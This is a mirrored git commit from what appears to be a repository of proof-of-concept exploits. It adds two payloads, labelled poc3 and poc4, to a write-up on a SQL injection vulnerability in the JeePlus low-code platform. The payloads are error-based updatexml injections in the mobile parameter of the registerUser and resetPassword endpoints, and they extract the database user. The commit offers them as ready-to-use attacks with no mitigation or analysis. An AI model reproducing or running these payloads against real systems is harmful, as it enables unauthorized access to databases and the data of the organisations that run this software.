mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 17:25:35 +08:00
Update JeePlus低代码开发平台存在SQL注入漏洞.md
This commit is contained in:
@@ -24,3 +24,13 @@ Accept: */*
|
|||||||
Connection: Keep-Alive
|
Connection: Keep-Alive
|
||||||
Cookie: jeeplus.session.id=a24d6e112a864ef795cce1f664a6022a;
|
Cookie: jeeplus.session.id=a24d6e112a864ef795cce1f664a6022a;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## poc3
|
||||||
|
```
|
||||||
|
/a/sys/register/registerUser?roleName=wangba&mobile=13300990099'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc4
|
||||||
|
```
|
||||||
|
/a/sys/user/resetPassword?mobile=13588888888'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23
|
||||||
|
```
|
||||||
|
|||||||
Reference in New Issue
Block a user